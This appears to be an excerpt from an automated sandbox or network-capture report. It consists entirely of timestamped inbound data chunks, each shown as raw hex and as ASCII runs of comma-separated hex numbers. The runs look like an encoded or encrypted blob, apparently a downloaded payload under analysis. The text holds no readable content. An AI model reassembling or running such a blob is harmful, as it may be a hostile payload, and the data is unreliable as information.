                                                    2023-11-04 00:30:16 UTC44INData Raw: 2c 31 30 30 2c 66 65 2c 31 30 64 2c 31 31 64 2c 31 32 66 2c 31 32 31 2c 31 33 31 2c 31 32 34 2c 31 31 32 2c 38 64 2c 63 34 2c 31 35 63 2c 39 34 2c 64 38 2c 37 65 2c 31 34 61 2c 66 37 2c 39 31 2c 35 65 2c 62 62 2c 64 66 2c 61 37 2c 36 66 2c 62 33 2c 63 33 2c 39 39 2c 31 37 30 2c 65 35 2c 36 66 2c 64 36 2c 63 34 2c 31 33 66 2c 62 66 2c 38 32 2c 36 31 2c 31 35 30 2c 31 33 35 2c 65 30 2c 31 34 61 2c 62 35 2c 31 30 38 2c 34 30 2c 33 39 2c 31 33 63 2c 31 30 66 2c 31 31 62 2c 66 64 2c 31 31 61 2c 31 33 38 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 65 65 2c 31 33 37 2c 31 31 33 2c 34 33 2c 33 34 2c 33 32 2c 31 30 38 2c 64 36 2c 63 62 2c 31 35 34 2c 31 36 34 2c 31 35 37 2c 34 36
                                                    Data Ascii: ,100,fe,10d,11d,12f,121,131,124,112,8d,c4,15c,94,d8,7e,14a,f7,91,5e,bb,df,a7,6f,b3,c3,99,170,e5,6f,d6,c4,13f,bf,82,61,150,135,e0,14a,b5,108,40,39,13c,10f,11b,fd,11a,138,118,11e,137,120,126,133,12e,104,99,ff,146,ee,137,113,43,34,32,108,d6,cb,154,164,157,46
                                                    2023-11-04 00:30:16 UTC45INData Raw: 32 38 2c 38 32 2c 31 32 30 2c 35 30 2c 31 35 38 2c 31 35 39 2c 31 36 63 2c 64 36 2c 63 34 2c 31 33 66 2c 62 37 2c 66 33 2c 34 35 2c 31 33 39 2c 36 34 2c 31 33 39 2c 31 36 34 2c 31 35 37 2c 64 31 2c 38 35 2c 31 33 35 2c 31 35 38 2c 38 30 2c 38 35 2c 33 31 2c 34 65 2c 66 37 2c 31 33 31 2c 61 66 2c 31 32 65 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 62 65 2c 64 34 2c 63 34 2c 31 33 66 2c 62 66 2c 37 37 2c 31 33 64 2c 64 63 2c 36 62 2c 64 38 2c 31 32 36 2c 37 30 2c 39 37 2c 63 33 2c 38 36 2c 37 38 2c 31 32 62 2c 36 37 2c 31 31 65 2c 31 34 64 2c 31 36 62 2c 64 37 2c 39 37 2c 37 33 2c 64 66 2c 31 33 66 2c 63 34 2c 31 32 34 2c 33 63 2c 34 34 2c 31 34 30 2c 31 32 36 2c 31 33 39 2c 31 31 37 2c 31 34 33 2c 31 30 66
                                                    Data Ascii: 28,82,120,50,158,159,16c,d6,c4,13f,b7,f3,45,139,64,139,164,157,d1,85,135,158,80,85,31,4e,f7,131,af,12e,120,126,133,12e,104,99,ff,146,be,d4,c4,13f,bf,77,13d,dc,6b,d8,126,70,97,c3,86,78,12b,67,11e,14d,16b,d7,97,73,df,13f,c4,124,3c,44,140,126,139,117,143,10f
                                                    2023-11-04 00:30:16 UTC47INData Raw: 38 39 2c 63 34 2c 62 64 2c 35 37 2c 31 33 37 2c 31 30 38 2c 31 33 32 2c 31 36 62 2c 31 34 62 2c 61 32 2c 31 35 33 2c 31 33 35 2c 37 33 2c 36 37 2c 36 32 2c 62 62 2c 31 30 38 2c 37 38 2c 65 33 2c 62 32 2c 31 34 37 2c 31 30 34 2c 39 30 2c 31 30 63 2c 31 31 61 2c 35 34 2c 31 33 35 2c 31 36 32 2c 31 35 34 2c 66 32 2c 61 35 2c 31 32 32 2c 31 32 30 2c 64 34 2c 31 36 65 2c 31 34 32 2c 31 34 65 2c 34 30 2c 31 30 34 2c 63 31 2c 36 38 2c 64 37 2c 31 33 64 2c 63 38 2c 37 39 2c 66 34 2c 61 37 2c 66 34 2c 39 34 2c 66 66 2c 61 37 2c 31 36 39 2c 31 33 33 2c 31 35 65 2c 35 36 2c 33 34 2c 33 32 2c 39 31 2c 64 65 2c 62 30 2c 31 33 31 2c 31 34 64 2c 36 36 2c 34 65 2c 33 38 2c 33 39 2c 66 64 2c 39 30 2c 31 30 62 2c 31 31 39 2c 38 34 2c 31 34 65 2c 31 34 62 2c 31 35 31 2c 31
                                                    Data Ascii: 89,c4,bd,57,137,108,132,16b,14b,a2,153,135,73,67,62,bb,108,78,e3,b2,147,104,90,10c,11a,54,135,162,154,f2,a5,122,120,d4,16e,142,14e,40,104,c1,68,d7,13d,c8,79,f4,a7,f4,94,ff,a7,169,133,15e,56,34,32,91,de,b0,131,14d,66,4e,38,39,fd,90,10b,119,84,14e,14b,151,1
                                                    2023-11-04 00:30:16 UTC48INData Raw: 2c 36 35 2c 35 38 2c 63 39 2c 66 63 2c 34 39 2c 63 30 2c 61 64 2c 38 66 2c 62 65 2c 39 33 2c 31 32 34 2c 39 63 2c 31 33 61 2c 64 66 2c 62 32 2c 35 61 2c 36 37 2c 65 35 2c 66 63 2c 35 34 2c 63 34 2c 65 37 2c 62 61 2c 31 30 33 2c 63 38 2c 35 32 2c 65 61 2c 38 37 2c 35 39 2c 61 33 2c 65 65 2c 39 61 2c 37 39 2c 61 38 2c 64 31 2c 38 35 2c 34 39 2c 63 31 2c 63 65 2c 61 34 2c 33 64 2c 61 30 2c 66 37 2c 39 31 2c 35 61 2c 62 62 2c 64 66 2c 61 37 2c 31 31 33 2c 62 33 2c 31 32 30 2c 66 30 2c 38 32 2c 35 61 2c 36 64 2c 63 65 2c 31 33 62 2c 36 33 2c 62 66 2c 37 37 2c 34 39 2c 64 63 2c 31 34 38 2c 62 32 2c 31 32 37 2c 37 30 2c 34 36 2c 38 64 2c 63 34 2c 31 35 63 2c 63 36 2c 31 33 62 2c 38 35 2c 64 37 2c 62 39 2c 66 38 2c 31 31 39 2c 62 30 2c 31 35 30 2c 39 61 2c 36 37
                                                    Data Ascii: ,65,58,c9,fc,49,c0,ad,8f,be,93,124,9c,13a,df,b2,5a,67,e5,fc,54,c4,e7,ba,103,c8,52,ea,87,59,a3,ee,9a,79,a8,d1,85,49,c1,ce,a4,3d,a0,f7,91,5a,bb,df,a7,113,b3,120,f0,82,5a,6d,ce,13b,63,bf,77,49,dc,148,b2,127,70,46,8d,c4,15c,c6,13b,85,d7,b9,f8,119,b0,150,9a,67
                                                    2023-11-04 00:30:16 UTC49INData Raw: 2c 31 31 38 2c 31 31 65 2c 31 33 37 2c 31 32 30 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 65 65 2c 31 33 37 2c 31 31 37 2c 34 33 2c 33 34 2c 33 32 2c 63 61 2c 64 65 2c 63 66 2c 31 35 34 2c 31 36 34 2c 31 35 37 2c 31 30 64 2c 37 64 2c 31 32 39 2c 64 63 2c 34 33 2c 34 66 2c 33 31 2c 64 39 2c 62 39 2c 36 30 2c 31 33 61 2c 36 64 2c 35 36 2c 35 61 2c 36 37 2c 65 37 2c 66 38 2c 63 33 2c 38 66 2c 65 35 2c 62 61 2c 35 66 2c 31 35 66 2c 66 39 2c 31 32 32 2c 31 33 31 2c 31 34 30 2c 37 36 2c 36 33 2c 37 35 2c 36 35 2c 35 38 2c 62 62 2c 34 34 2c 31 30 30 2c 66 35 2c 61 62 2c 31 34 65 2c 31 33 30 2c 31 34 64 2c 37 32 2c 34 63 2c 35 32 2c 36 62 2c 31 33 66 2c 36 38 2c 66 32 2c 61 66 2c 34 63 2c 31 32 63 2c 31 34 66 2c 35 62 2c 36
                                                    Data Ascii: ,118,11e,137,120,126,133,12e,104,99,ff,146,ee,137,117,43,34,32,ca,de,cf,154,164,157,10d,7d,129,dc,43,4f,31,d9,b9,60,13a,6d,56,5a,67,e7,f8,c3,8f,e5,ba,5f,15f,f9,122,131,140,76,63,75,65,58,bb,44,100,f5,ab,14e,130,14d,72,4c,52,6b,13f,68,f2,af,4c,12c,14f,5b,6
                                                    2023-11-04 00:30:16 UTC51INData Raw: 34 2c 31 36 34 2c 31 35 37 2c 63 62 2c 66 38 2c 61 64 2c 37 38 2c 31 32 30 2c 39 34 2c 34 64 2c 31 32 37 2c 31 34 63 2c 31 32 39 2c 61 66 2c 38 37 2c 64 37 2c 31 34 36 2c 36 66 2c 31 33 66 2c 37 64 2c 36 30 2c 31 35 31 2c 37 36 2c 39 31 2c 64 36 2c 31 30 34 2c 62 37 2c 31 33 33 2c 31 33 31 2c 31 34 30 2c 61 32 2c 65 65 2c 61 32 2c 37 39 2c 31 34 30 2c 37 33 2c 31 32 35 2c 31 33 38 2c 31 36 66 2c 39 33 2c 62 39 2c 33 31 2c 64 62 2c 31 30 31 2c 63 34 2c 31 35 31 2c 31 36 61 2c 31 35 33 2c 61 63 2c 66 32 2c 65 37 2c 61 34 2c 31 34 33 2c 31 37 33 2c 31 35 39 2c 62 64 2c 31 33 33 2c 64 65 2c 34 36 2c 33 34 2c 33 32 2c 63 34 2c 31 31 35 2c 37 33 2c 61 35 2c 63 66 2c 63 34 2c 64 33 2c 38 35 2c 62 39 2c 63 31 2c 31 32 62 2c 31 34 39 2c 38 62 2c 34 65 2c 36 63 2c
                                                    Data Ascii: 4,164,157,cb,f8,ad,78,120,94,4d,127,14c,129,af,87,d7,146,6f,13f,7d,60,151,76,91,d6,104,b7,133,131,140,a2,ee,a2,79,140,73,125,138,16f,93,b9,31,db,101,c4,151,16a,153,ac,f2,e7,a4,143,173,159,bd,133,de,46,34,32,c4,115,73,a5,cf,c4,d3,85,b9,c1,12b,149,8b,4e,6c,
                                                    2023-11-04 00:30:16 UTC52INData Raw: 33 2c 64 66 2c 31 33 66 2c 62 66 2c 37 66 2c 31 32 30 2c 37 39 2c 34 65 2c 31 31 61 2c 31 33 31 2c 31 34 30 2c 62 32 2c 38 31 2c 31 34 33 2c 34 66 2c 63 33 2c 37 65 2c 31 36 63 2c 63 36 2c 31 30 66 2c 33 62 2c 64 37 2c 62 31 2c 31 34 38 2c 31 32 66 2c 62 30 2c 37 30 2c 31 33 36 2c 38 34 2c 31 32 61 2c 31 33 37 2c 38 35 2c 37 34 2c 31 33 39 2c 31 34 64 2c 31 34 31 2c 31 33 62 2c 34 34 2c 61 39 2c 34 39 2c 63 32 2c 63 65 2c 31 35 66 2c 64 64 2c 37 38 2c 35 38 2c 34 36 2c 61 62 2c 34 37 2c 31 34 64 2c 38 38 2c 36 62 2c 31 30 64 2c 38 33 2c 31 32 63 2c 31 34 62 2c 39 33 2c 36 62 2c 31 33 31 2c 62 37 2c 38 33 2c 31 34 64 2c 31 30 38 2c 31 32 31 2c 62 39 2c 37 36 2c 31 34 39 2c 36 38 2c 31 35 37 2c 31 34 31 2c 37 35 2c 33 32 2c 31 32 30 2c 31 33 31 2c 31 35 39
                                                    Data Ascii: 3,df,13f,bf,7f,120,79,4e,11a,131,140,b2,81,143,4f,c3,7e,16c,c6,10f,3b,d7,b1,148,12f,b0,70,136,84,12a,137,85,74,139,14d,141,13b,44,a9,49,c2,ce,15f,dd,78,58,46,ab,47,14d,88,6b,10d,83,12c,14b,93,6b,131,b7,83,14d,108,121,b9,76,149,68,157,141,75,32,120,131,159
                                                    2023-11-04 00:30:16 UTC53INData Raw: 35 2c 35 61 2c 36 37 2c 36 32 2c 63 33 2c 38 39 2c 37 63 2c 64 64 2c 31 34 64 2c 34 63 2c 65 62 2c 34 66 2c 62 66 2c 37 66 2c 31 33 64 2c 61 32 2c 31 34 62 2c 31 34 63 2c 61 35 2c 35 38 2c 34 36 2c 62 62 2c 66 64 2c 37 34 2c 63 65 2c 39 34 2c 31 32 64 2c 64 39 2c 31 35 31 2c 61 39 2c 31 31 34 2c 36 66 2c 35 34 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 62 65 2c 64 34 2c 63 34 2c 31 33 66 2c 62 66 2c 37 37 2c 31 33 64 2c 31 31 38 2c 36 33 2c 63 64 2c 31 36 34 2c 39 39 2c 34 36 2c 63 33 2c 38 36 2c 31 36 63 2c 31 32 62 2c 39 37 2c 31 32 38 2c 31 34 64 2c 31 36 62 2c 64 37 2c 31 33 37 2c 63 38 2c 31 31 37 2c 31 32 36 2c 31 33 33 2c 31 32 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 62 65 2c 64 34 2c 63 34 2c 31 33 66
                                                    Data Ascii: 5,5a,67,62,c3,89,7c,dd,14d,4c,eb,4f,bf,7f,13d,a2,14b,14c,a5,58,46,bb,fd,74,ce,94,12d,d9,151,a9,114,6f,54,126,133,12e,104,99,ff,146,be,d4,c4,13f,bf,77,13d,118,63,cd,164,99,46,c3,86,16c,12b,97,128,14d,16b,d7,137,c8,117,126,133,12e,104,99,ff,146,be,d4,c4,13f
                                                    2023-11-04 00:30:16 UTC58INData Raw: 31 33 38 2c 31 36 66 2c 31 34 32 2c 39 66 2c 62 63 2c 39 62 2c 37 34 2c 39 64 2c 31 33 61 2c 31 33 64 2c 35 64 2c 35 61 2c 36 37 2c 65 35 2c 66 63 2c 36 30 2c 66 66 2c 36 61 2c 66 38 2c 38 62 2c 37 62 2c 63 63 2c 38 39 2c 34 32 2c 63 61 2c 39 36 2c 37 37 2c 65 30 2c 62 32 2c 37 63 2c 39 37 2c 34 37 2c 65 66 2c 63 35 2c 31 33 61 2c 61 31 2c 62 63 2c 39 33 2c 38 30 2c 39 63 2c 64 64 2c 62 38 2c 36 34 2c 61 62 2c 66 34 2c 66 37 2c 61 30 2c 31 34 33 2c 31 37 33 2c 31 35 39 2c 62 66 2c 64 36 2c 62 63 2c 34 62 2c 38 34 2c 31 31 61 2c 38 34 2c 35 37 2c 36 33 2c 35 35 2c 65 38 2c 31 31 63 2c 35 65 2c 63 33 2c 34 31 2c 66 62 2c 39 33 2c 35 33 2c 62 61 2c 39 62 2c 37 63 2c 64 35 2c 61 37 2c 37 66 2c 62 65 2c 35 62 2c 66 32 2c 61 66 2c 31 33 30 2c 31 32 63 2c 31 33
                                                    Data Ascii: 138,16f,142,9f,bc,9b,74,9d,13a,13d,5d,5a,67,e5,fc,60,ff,6a,f8,8b,7b,cc,89,42,ca,96,77,e0,b2,7c,97,47,ef,c5,13a,a1,bc,93,80,9c,dd,b8,64,ab,f4,f7,a0,143,173,159,bf,d6,bc,4b,84,11a,84,57,63,55,e8,11c,5e,c3,41,fb,93,53,ba,9b,7c,d5,a7,7f,be,5b,f2,af,130,12c,13
                                                    2023-11-04 00:30:16 UTC62INData Raw: 2c 36 35 2c 62 35 2c 65 35 2c 39 33 2c 66 38 2c 38 61 2c 66 62 2c 39 38 2c 35 37 2c 38 33 2c 31 33 36 2c 63 31 2c 34 64 2c 35 32 2c 36 62 2c 64 37 2c 31 31 65 2c 37 66 2c 65 64 2c 34 30 2c 63 66 2c 63 34 2c 35 65 2c 66 36 2c 39 38 2c 38 37 2c 63 63 2c 38 39 2c 34 36 2c 31 30 38 2c 39 36 2c 31 35 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 31 32 33 2c 62 32 2c 66 31 2c 63 30 2c 31 34 62 2c 33 31 2c 34 66 2c 36 63 2c 34 63 2c 63 37 2c 64 62 2c 64 66 2c 39 66 2c 31 35 62 2c 62 32 2c 63 33 2c 39 31 2c 39 34 2c 61 62 2c 66 38 2c 61 30 2c 38 62 2c 39 35 2c 62 66 2c 37 37 2c 35 31 2c 61 31 2c 66 30 2c 61 32 2c 31 31 64 2c 61 39 2c 64 31 2c 38 64 2c 34 31 2c 63 32 2c 31 32 62 2c 35 37 2c 33 35 2c 34 65 2c 36 63 2c 63 66 2c 31 31 36 2c 38 33 2c 64 66 2c 36 32 2c 66
                                                    Data Ascii: ,65,b5,e5,93,f8,8a,fb,98,57,83,136,c1,4d,52,6b,d7,11e,7f,ed,40,cf,c4,5e,f6,98,87,cc,89,46,108,96,153,55,65,58,46,123,b2,f1,c0,14b,31,4f,6c,4c,c7,db,df,9f,15b,b2,c3,91,94,ab,f8,a0,8b,95,bf,77,51,a1,f0,a2,11d,a9,d1,8d,41,c2,12b,57,35,4e,6c,cf,116,83,df,62,f
                                                    2023-11-04 00:30:16 UTC66INData Raw: 63 2c 63 63 2c 61 34 2c 31 31 35 2c 64 39 2c 62 31 2c 31 33 30 2c 64 62 2c 62 30 2c 31 34 63 2c 65 35 2c 62 34 2c 31 35 61 2c 38 39 2c 63 66 2c 63 39 2c 37 32 2c 62 66 2c 64 36 2c 62 63 2c 35 37 2c 38 34 2c 62 64 2c 38 65 2c 36 31 2c 62 34 2c 65 32 2c 62 61 2c 31 34 38 2c 39 38 2c 63 33 2c 37 65 2c 37 38 2c 39 33 2c 31 33 37 2c 35 38 2c 31 34 64 2c 31 36 62 2c 31 34 62 2c 64 35 2c 31 32 66 2c 36 63 2c 65 35 2c 36 66 2c 65 64 2c 38 38 2c 34 38 2c 66 64 2c 61 37 2c 37 64 2c 64 34 2c 63 63 2c 35 37 2c 62 66 2c 37 37 2c 35 39 2c 35 34 2c 61 38 2c 31 34 64 2c 65 65 2c 39 64 2c 35 65 2c 63 33 2c 38 36 2c 38 63 2c 36 65 2c 39 63 2c 31 32 39 2c 64 37 2c 62 39 2c 36 38 2c 63 37 2c 36 64 2c 31 33 66 2c 39 31 2c 37 36 2c 31 32 30 2c 38 64 2c 36 34 2c 66 39 2c 31 32
                                                    Data Ascii: c,cc,a4,115,d9,b1,130,db,b0,14c,e5,b4,15a,89,cf,c9,72,bf,d6,bc,57,84,bd,8e,61,b4,e2,ba,148,98,c3,7e,78,93,137,58,14d,16b,14b,d5,12f,6c,e5,6f,ed,88,48,fd,a7,7d,d4,cc,57,bf,77,59,54,a8,14d,ee,9d,5e,c3,86,8c,6e,9c,129,d7,b9,68,c7,6d,13f,91,76,120,8d,64,f9,12
                                                    2023-11-04 00:30:16 UTC68INData Raw: 65 2c 31 30 34 2c 39 39 2c 66 66 2c 31 34 36 2c 66 30 2c 31 33 37 2c 39 62 2c 61 64 2c 33 34 2c 62 66 2c 38 65 2c 31 34 35 2c 31 34 62 2c 66 31 2c 37 66 2c 35 38 2c 34 36 2c 64 39 2c 39 64 2c 31 33 33 2c 38 61 2c 34 66 2c 62 61 2c 39 33 2c 31 35 63 2c 31 30 35 2c 62 65 2c 31 32 65 2c 39 62 2c 35 61 2c 31 34 66 2c 64 30 2c 31 31 38 2c 31 34 33 2c 31 37 33 2c 65 33 2c 62 32 2c 31 34 33 2c 31 30 32 2c 39 30 2c 31 32 63 2c 38 33 2c 63 63 2c 39 65 2c 36 62 2c 31 33 64 2c 31 33 34 2c 31 33 38 2c 31 34 35 2c 31 33 37 2c 63 32 2c 62 35 2c 31 33 66 2c 64 32 2c 61 65 2c 31 34 61 2c 36 63 2c 63 30 2c 35 34 2c 31 35 36 2c 62 39 2c 64 64 2c 65 34 2c 31 35 32 2c 33 38 2c 62 38 2c 37 63 2c 65 35 2c 63 32 2c 31 33 62 2c 31 30 30 2c 39 38 2c 31 33 30 2c 31 31 64 2c 39 38
                                                    Data Ascii: e,104,99,ff,146,f0,137,9b,ad,34,bf,8e,145,14b,f1,7f,58,46,d9,9d,133,8a,4f,ba,93,15c,105,be,12e,9b,5a,14f,d0,118,143,173,e3,b2,143,102,90,12c,83,cc,9e,6b,13d,134,138,145,137,c2,b5,13f,d2,ae,14a,6c,c0,54,156,b9,dd,e4,152,38,b8,7c,e5,c2,13b,100,98,130,11d,98
                                                    2023-11-04 00:30:16 UTC72INData Raw: 2c 66 30 2c 61 35 2c 65 65 2c 63 31 2c 37 61 2c 37 38 2c 64 30 2c 61 34 2c 65 35 2c 61 30 2c 66 37 2c 39 39 2c 35 61 2c 31 35 33 2c 62 35 2c 31 35 38 2c 31 36 36 2c 31 36 31 2c 38 38 2c 61 65 2c 37 34 2c 63 34 2c 39 62 2c 31 33 33 2c 31 32 65 2c 31 33 65 2c 31 33 33 2c 31 33 31 2c 63 34 2c 31 31 35 2c 36 66 2c 65 30 2c 62 32 2c 31 30 30 2c 63 65 2c 37 39 2c 34 35 2c 66 64 2c 39 38 2c 66 62 2c 38 33 2c 64 39 2c 62 39 2c 35 34 2c 31 33 61 2c 61 64 2c 31 35 32 2c 31 35 39 2c 31 36 36 2c 62 32 2c 61 32 2c 34 34 2c 64 65 2c 38 36 2c 31 35 35 2c 65 33 2c 31 37 32 2c 31 34 32 2c 31 33 33 2c 62 35 2c 31 30 35 2c 35 64 2c 65 65 2c 61 32 2c 31 30 64 2c 65 30 2c 38 37 2c 34 35 2c 63 34 2c 62 64 2c 31 33 37 2c 62 33 2c 62 61 2c 35 62 2c 36 63 2c 34 63 2c 35 32 2c 36
                                                    Data Ascii: ,f0,a5,ee,c1,7a,78,d0,a4,e5,a0,f7,99,5a,153,b5,158,166,161,88,ae,74,c4,9b,133,12e,13e,133,131,c4,115,6f,e0,b2,100,ce,79,45,fd,98,fb,83,d9,b9,54,13a,ad,152,159,166,b2,a2,44,de,86,155,e3,172,142,133,b5,105,5d,ee,a2,10d,e0,87,45,c4,bd,137,b3,ba,5b,6c,4c,52,6
                                                    2023-11-04 00:30:16 UTC76INData Raw: 31 34 36 2c 63 65 2c 37 63 2c 64 36 2c 38 31 2c 63 65 2c 37 64 2c 33 36 2c 63 63 2c 38 36 2c 31 34 66 2c 31 31 39 2c 61 63 2c 35 38 2c 63 66 2c 61 63 2c 34 61 2c 39 63 2c 61 31 2c 31 31 32 2c 62 63 2c 31 34 64 2c 63 32 2c 64 37 2c 31 34 33 2c 66 36 2c 61 32 2c 39 32 2c 31 32 65 2c 36 38 2c 61 38 2c 34 34 2c 62 36 2c 35 61 2c 66 32 2c 31 31 34 2c 65 62 2c 34 61 2c 39 65 2c 33 33 2c 31 32 39 2c 35 63 2c 31 36 30 2c 31 35 34 2c 31 36 34 2c 65 35 2c 39 34 2c 33 63 2c 39 37 2c 31 35 39 2c 31 31 62 2c 36 31 2c 33 31 2c 34 65 2c 65 66 2c 31 31 34 2c 31 35 31 2c 31 32 64 2c 35 38 2c 35 61 2c 65 61 2c 31 32 61 2c 31 33 37 2c 31 30 37 2c 66 66 2c 31 35 39 2c 63 32 2c 64 36 2c 31 36 33 2c 31 34 32 2c 61 39 2c 33 65 2c 63 63 2c 35 32 2c 63 64 2c 31 35 34 2c 31 36 34
                                                    Data Ascii: 146,ce,7c,d6,81,ce,7d,36,cc,86,14f,119,ac,58,cf,ac,4a,9c,a1,112,bc,14d,c2,d7,143,f6,a2,92,12e,68,a8,44,b6,5a,f2,114,eb,4a,9e,33,129,5c,160,154,164,e5,94,3c,97,159,11b,61,31,4e,ef,114,151,12d,58,5a,ea,12a,137,107,ff,159,c2,d6,163,142,a9,3e,cc,52,cd,154,164
                                                    2023-11-04 00:30:16 UTC80INData Raw: 2c 61 61 2c 61 66 2c 31 32 64 2c 35 38 2c 35 61 2c 66 32 2c 31 36 31 2c 38 64 2c 63 66 2c 31 36 30 2c 62 30 2c 66 38 2c 63 30 2c 37 66 2c 63 65 2c 33 61 2c 38 39 2c 63 63 2c 31 34 61 2c 65 65 2c 31 32 33 2c 31 36 34 2c 61 38 2c 34 61 2c 62 63 2c 66 39 2c 65 34 2c 34 39 2c 64 32 2c 39 38 2c 38 61 2c 36 63 2c 31 33 37 2c 35 63 2c 66 36 2c 31 32 33 2c 65 33 2c 64 65 2c 39 65 2c 31 32 30 2c 31 30 63 2c 31 36 66 2c 31 35 39 2c 31 36 63 2c 61 61 2c 64 35 2c 61 30 2c 66 36 2c 33 36 2c 34 31 2c 64 63 2c 31 36 32 2c 61 61 2c 66 30 2c 31 34 34 2c 39 63 2c 63 33 2c 31 32 61 2c 66 62 2c 38 39 2c 39 62 2c 36 34 2c 31 31 37 2c 61 37 2c 31 30 64 2c 63 36 2c 39 63 2c 38 64 2c 61 37 2c 36 66 2c 64 37 2c 34 30 2c 37 64 2c 63 31 2c 36 36 2c 65 32 2c 34 65 2c 65 31 2c 34 37
                                                    Data Ascii: ,aa,af,12d,58,5a,f2,161,8d,cf,160,b0,f8,c0,7f,ce,3a,89,cc,14a,ee,123,164,a8,4a,bc,f9,e4,49,d2,98,8a,6c,137,5c,f6,123,e3,de,9e,120,10c,16f,159,16c,aa,d5,a0,f6,36,41,dc,162,aa,f0,144,9c,c3,12a,fb,89,9b,64,117,a7,10d,c6,9c,8d,a7,6f,d7,40,7d,c1,66,e2,4e,e1,47
                                                    2023-11-04 00:30:16 UTC85INData Raw: 66 2c 31 31 64 2c 39 62 2c 31 30 34 2c 39 30 2c 31 30 38 2c 31 31 61 2c 63 37 2c 31 34 63 2c 31 36 32 2c 31 35 34 2c 66 30 2c 31 32 30 2c 31 32 65 2c 63 65 2c 31 32 63 2c 31 36 66 2c 31 34 32 2c 64 63 2c 38 36 2c 31 31 36 2c 36 66 2c 31 34 37 2c 61 34 2c 66 38 2c 62 32 2c 39 65 2c 31 35 30 2c 31 30 61 2c 33 38 2c 34 34 2c 37 34 2c 64 64 2c 31 36 35 2c 34 63 2c 38 36 2c 64 32 2c 66 37 2c 33 32 2c 34 31 2c 35 31 2c 66 30 2c 39 61 2c 31 30 64 2c 61 38 2c 64 33 2c 38 35 2c 31 30 64 2c 31 35 38 2c 39 66 2c 31 34 61 2c 31 33 30 2c 31 34 64 2c 66 37 2c 31 31 34 2c 31 33 61 2c 64 37 2c 31 34 37 2c 31 35 39 2c 31 36 36 2c 65 64 2c 62 35 2c 31 30 63 2c 39 66 2c 31 35 32 2c 65 31 2c 37 35 2c 31 30 34 2c 38 38 2c 64 34 2c 38 32 2c 63 65 2c 39 65 2c 31 33 37 2c 31 33
                                                    Data Ascii: f,11d,9b,104,90,108,11a,c7,14c,162,154,f0,120,12e,ce,12c,16f,142,dc,86,116,6f,147,a4,f8,b2,9e,150,10a,38,44,74,dd,165,4c,86,d2,f7,32,41,51,f0,9a,10d,a8,d3,85,10d,158,9f,14a,130,14d,f7,114,13a,d7,147,159,166,ed,b5,10c,9f,152,e1,75,104,88,d4,82,ce,9e,137,13
                                                    2023-11-04 00:30:16 UTC89INData Raw: 66 38 2c 38 30 2c 65 66 2c 31 30 36 2c 37 62 2c 33 32 2c 63 34 2c 62 36 2c 31 35 66 2c 35 35 2c 31 31 65 2c 36 38 2c 31 30 61 2c 37 66 2c 33 39 2c 66 39 2c 62 38 2c 31 33 66 2c 31 31 39 2c 63 34 2c 31 33 33 2c 31 34 62 2c 31 35 31 2c 66 36 2c 61 31 2c 36 32 2c 62 37 2c 31 34 61 2c 31 31 35 2c 31 30 62 2c 31 37 33 2c 31 35 39 2c 66 38 2c 31 34 33 2c 66 63 2c 31 34 32 2c 61 39 2c 37 66 2c 63 36 2c 31 34 37 2c 64 37 2c 35 39 2c 66 30 2c 31 35 36 2c 31 33 31 2c 37 64 2c 31 33 38 2c 65 35 2c 34 62 2c 64 63 2c 37 36 2c 31 33 65 2c 62 63 2c 31 33 34 2c 38 30 2c 31 36 39 2c 31 35 33 2c 31 35 39 2c 63 30 2c 62 62 2c 62 62 2c 31 33 63 2c 31 37 33 2c 63 66 2c 38 38 2c 62 33 2c 64 33 2c 31 34 32 2c 37 35 2c 33 32 2c 63 65 2c 39 65 2c 31 34 33 2c 31 33 64 2c 61 64 2c
                                                    Data Ascii: f8,80,ef,106,7b,32,c4,b6,15f,55,11e,68,10a,7f,39,f9,b8,13f,119,c4,133,14b,151,f6,a1,62,b7,14a,115,10b,173,159,f8,143,fc,142,a9,7f,c6,147,d7,59,f0,156,131,7d,138,e5,4b,dc,76,13e,bc,134,80,169,153,159,c0,bb,bb,13c,173,cf,88,b3,d3,142,75,32,ce,9e,143,13d,ad,
                                                    2023-11-04 00:30:16 UTC93INData Raw: 36 66 2c 31 30 35 2c 62 38 2c 31 30 38 2c 62 62 2c 35 61 2c 63 61 2c 31 30 65 2c 65 31 2c 34 37 2c 65 63 2c 38 38 2c 66 32 2c 39 32 2c 36 33 2c 31 33 64 2c 61 64 2c 38 35 2c 34 36 2c 33 38 2c 61 33 2c 37 30 2c 64 30 2c 39 63 2c 31 32 31 2c 31 33 36 2c 66 64 2c 31 34 38 2c 31 35 31 2c 31 36 61 2c 64 66 2c 64 37 2c 36 66 2c 65 35 2c 39 64 2c 31 34 30 2c 37 34 2c 65 35 2c 65 34 2c 35 37 2c 31 36 32 2c 36 32 2c 62 66 2c 37 39 2c 34 39 2c 39 66 2c 66 30 2c 35 39 2c 31 31 35 2c 64 62 2c 37 65 2c 33 38 2c 61 64 2c 38 33 2c 63 65 2c 35 37 2c 31 31 39 2c 61 34 2c 31 31 38 2c 31 34 62 2c 31 35 31 2c 66 30 2c 31 31 34 2c 63 65 2c 36 66 2c 65 64 2c 34 38 2c 61 65 2c 37 35 2c 65 35 2c 31 33 35 2c 31 34 61 2c 38 39 2c 63 38 2c 31 32 61 2c 61 39 2c 31 31 65 2c 31 35 30
                                                    Data Ascii: 6f,105,b8,108,bb,5a,ca,10e,e1,47,ec,88,f2,92,63,13d,ad,85,46,38,a3,70,d0,9c,121,136,fd,148,151,16a,df,d7,6f,e5,9d,140,74,e5,e4,57,162,62,bf,79,49,9f,f0,59,115,db,7e,38,ad,83,ce,57,119,a4,118,14b,151,f0,114,ce,6f,ed,48,ae,75,e5,135,14a,89,c8,12a,a9,11e,150
